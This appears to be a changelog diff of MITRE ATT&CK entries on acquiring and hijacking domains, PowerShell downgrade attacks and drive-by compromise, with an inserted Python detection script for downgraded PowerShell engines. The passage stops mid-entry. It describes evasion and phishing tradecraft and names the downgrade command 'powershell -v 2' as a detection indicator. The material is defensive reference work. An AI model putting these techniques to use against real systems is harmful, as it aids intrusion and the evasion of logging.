Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-630 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 17:09:26.334000+00:00 | 2022-10-18 19:21:38.441000+00:00 |
| description | Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) | Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. 
Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) |
| external_references[1]['source_name'] | capec | PaypalScam |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/630.html | https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/ |
| external_references[2]['source_name'] | CISA MSS Sep 2020 | CISA IDN ST05-016 |
| external_references[2]['description'] | CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020. | CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020. |
| external_references[2]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa20-258a | https://us-cert.cisa.gov/ncas/tips/ST05-016 |
| external_references[3]['source_name'] | FireEye APT28 | CISA MSS Sep 2020 |
| external_references[3]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020. |
| external_references[3]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://us-cert.cisa.gov/ncas/alerts/aa20-258a |
| external_references[4]['source_name'] | PaypalScam | bypass_webproxy_filtering |
| external_references[4]['description'] | Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017. | Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019. |
| external_references[4]['url'] | https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/ | https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/ |
| external_references[5]['source_name'] | CISA IDN ST05-016 | FireEye APT28 |
| external_references[5]['description'] | CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. |
| external_references[5]['url'] | https://us-cert.cisa.gov/ncas/tips/ST05-016 | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf |
| external_references[6]['source_name'] | Mandiant APT1 | Domain_Steal_CC |
| external_references[6]['description'] | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. | Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019. |
| external_references[6]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf | https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/ |
| external_references[7]['source_name'] | ThreatConnect Infrastructure Dec 2020 | tt_obliqueRAT |
| external_references[7]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022. |
| external_references[7]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html |
| x_mitre_data_sources[0] | Domain Name: Active DNS | Domain Name: Domain Registration |
| x_mitre_data_sources[2] | Domain Name: Domain Registration | Domain Name: Active DNS |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'tt_httrack_fake_domains', 'description': 'Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.', 'url': 'https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html'} | |
| external_references | {'source_name': 'Mandiant APT1', 'description': 'Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf'} | |
| external_references | {'source_name': 'Categorisation_not_boundary', 'description': 'MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.', 'url': 'https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/'} | |
| external_references | {'source_name': 'Redirectors_Domain_Fronting', 'description': 'Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.', 'url': 'https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/'} | |
| external_references | {'source_name': 'lazgroup_idn_phishing', 'description': 'RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.', 'url': 'https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/'} | |
| external_references | {'source_name': 'httrack_unhcr', 'description': 'RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.', 'url': 'https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/'} | |
| external_references | {'source_name': 'ThreatConnect Infrastructure Dec 2020', 'description': 'ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.', 'url': 'https://threatconnect.com/blog/infrastructure-research-hunting/'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/630.html', 'external_id': 'CAPEC-630'} | |
| x_mitre_contributors | Oleg Kolesnikov, Securonix | |
| x_mitre_contributors | Menachem Goldstein |
| Old Description | New Description |
|---|---|
| Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jeremy Galloway'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 15:51:26.715000+00:00 | 2022-04-20 14:10:48.814000+00:00 |
| description | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) | Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019) Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020) |
| external_references[1]['source_name'] | ICANNDomainNameHijacking | Krebs DNS Hijack 2019 |
| external_references[1]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | Brian Krebs. (2019, February 18). A Deep Dive on the Recent Widespread DNS Hijacking Attacks. Retrieved February 14, 2022. |
| external_references[1]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/ |
| external_references[2]['source_name'] | Microsoft Sub Takeover 2020 | ICANNDomainNameHijacking |
| external_references[2]['description'] | Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover | https://www.icann.org/groups/ssac/documents/sac-007-en |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Sub Takeover 2020', 'description': 'Microsoft. (2020, September 29). Prevent dangling DNS entries and avoid subdomain takeover. Retrieved October 12, 2020.', 'url': 'https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover'} |
| Old Description | New Description |
|---|---|
| Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. 
However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Mayuresh Dani, Qualys', 'Daniel Feichter, @VirtualAllocEx, Infosec Tirol'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 00:48:06.723000+00:00 | 2022-05-19 16:28:31.041000+00:00 |
| description | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) | Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. 
However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging) Adversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014) |
| external_references[2]['source_name'] | Mandiant BYOL 2018 | att_def_ps_logging |
| external_references[2]['description'] | Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021. | Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021. |
| external_references[2]['url'] | https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique | https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/ |
| external_references[3]['source_name'] | Praetorian TLS Downgrade Attack 2014 | inv_ps_attacks |
| external_references[3]['description'] | Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021. | Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021. |
| external_references[3]['url'] | https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/ | https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/ |
| x_mitre_data_sources[0] | Command: Command Execution | Process: Process Metadata |
| x_mitre_data_sources[1] | Process: Process Metadata | Command: Command Execution |
| x_mitre_detection | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell -v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment. | Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell -v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment. Monitor for Windows event ID (EID) 400, specifically the EngineVersion field which shows the version of PowerShell running and may highlight a malicious downgrade attack.(Citation: inv_ps_attacks) |
| x_mitre_version | 1.0 | 1.1 |
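The detection text above names two signals for a PowerShell downgrade: a command line that asks for an old engine (`powershell -v 2`) and a Windows PowerShell EID 400 record whose EngineVersion field reports a pre-5 engine. The Python below is an added example of checking both signals; it is not ATT&CK's code nor taken from the cited articles. The event records and command lines are constructed for the example, the host name and executable path in them are placeholders, and the record layout (EngineVersion inside the third EventData `<Data>` element) follows the shape of the "Windows PowerShell" log as this example assumes it.

```python
"""Flag PowerShell engine downgrades from command lines and EID 400 events.

Added example; sample events and command lines are constructed, not captured
from a real host.
"""
import re
import xml.etree.ElementTree as ET
from typing import Iterable, List, Optional

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed EID 400 ("Engine state is changed from None to Available") records
# in the shape of the Windows PowerShell log. Host name and path are placeholders.
SAMPLE_EVENTS = [
    # Downgraded engine: EngineVersion=2.0, the case the detection text calls out.
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="PowerShell"/><EventID Qualifiers="0">400</EventID>
    <Computer>ws01.example.invalid</Computer></System>
  <EventData><Data>Available</Data><Data>None</Data>
    <Data>NewEngineState=Available
  PreviousEngineState=None
  SequenceNumber=13
  HostName=ConsoleHost
  HostVersion=2.0
  HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -v 2
  EngineVersion=2.0
  CommandLine=</Data></EventData></Event>""",
    # Expected engine on a patched host: EngineVersion=5.1.x, not an alert.
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="PowerShell"/><EventID Qualifiers="0">400</EventID>
    <Computer>ws01.example.invalid</Computer></System>
  <EventData><Data>Available</Data><Data>None</Data>
    <Data>NewEngineState=Available
  HostName=ConsoleHost
  HostVersion=5.1.19041.1
  EngineVersion=5.1.19041.1
  CommandLine=</Data></EventData></Event>""",
    # Different event ID (engine stopped); ignored by the EID 400 check.
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="PowerShell"/><EventID Qualifiers="0">403</EventID></System>
  <EventData><Data>Stopped</Data><Data>Available</Data>
    <Data>EngineVersion=2.0</Data></EventData></Event>""",
]

# powershell.exe accepts any unambiguous prefix of -Version (-v, -ve, ... -version),
# case-insensitively, with either a dash or a slash. Longest prefix listed first.
_VERSION_FLAG = "|".join("version"[:n] for n in range(7, 0, -1))
_VERSION_ARG_RE = re.compile(rf"(?i)(?:^|\s)[-/](?:{_VERSION_FLAG})\s+(\d+(?:\.\d+)?)")
_ENGINE_RE = re.compile(r"EngineVersion=(\d+(?:\.\d+)*)")


def requested_version(cmdline: str) -> Optional[str]:
    """Return the engine version a command line explicitly requests, if any."""
    m = _VERSION_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def is_legacy_engine(version: str, minimum_major: int = 5) -> bool:
    """True when the major version predates Script Block Logging (engine 5)."""
    try:
        return int(version.split(".")[0]) < minimum_major
    except ValueError:
        return False


def engine_version_from_event(xml_text: str) -> Optional[str]:
    """Extract EngineVersion from an EID 400 record; None for other event IDs."""
    root = ET.fromstring(xml_text)
    eid = root.find("e:System/e:EventID", NS)
    if eid is None or eid.text != "400":
        return None
    for data in root.iterfind("e:EventData/e:Data", NS):
        m = _ENGINE_RE.search(data.text or "")
        if m:
            return m.group(1)
    return None


def triage(events: Iterable[str], command_lines: Iterable[str]) -> List[str]:
    """Return one alert string per downgrade indicator found in either source."""
    alerts: List[str] = []
    for cmd in command_lines:
        v = requested_version(cmd)
        if v and is_legacy_engine(v):
            alerts.append(f"command line requests legacy engine {v}: {cmd}")
    for xml_text in events:
        v = engine_version_from_event(xml_text)
        if v and is_legacy_engine(v):
            alerts.append(f"EID 400 reports legacy EngineVersion {v}")
    return alerts


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS, ["powershell -v 2", "powershell -NoProfile -File a.ps1"]):
        print(line)
```

The EID 400 check is the more reliable of the two, because it reports the engine that actually started rather than what the launcher asked for; the command-line check is cheap to run over process-creation telemetry and catches the request even when the legacy engine is not installed and the launch fails. Tune `minimum_major` to the lowest engine version your environment legitimately runs.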
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Mandiant BYOL 2018', 'description': 'Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 8, 2021.', 'url': 'https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique'} | |
| external_references | {'source_name': 'Praetorian TLS Downgrade Attack 2014', 'description': 'Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.', 'url': 'https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/'} |
| Old Description | New Description |
|---|---|
| Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-28 01:37:46.704000+00:00 | 2022-03-08 21:11:47.798000+00:00 |
| description | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting. * Malicious ads are paid for and served through legitimate ad providers. * Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content). Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise) Typical drive-by compromise process: 1. A user visits a website that is used to host the adversary controlled content. 2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes. 3. Upon finding a vulnerable version, exploit code is delivered to the browser. 4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place. * In some cases a second visit to the website after the initial scan is required before exploit code is delivered. Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ. Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017) | Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001). 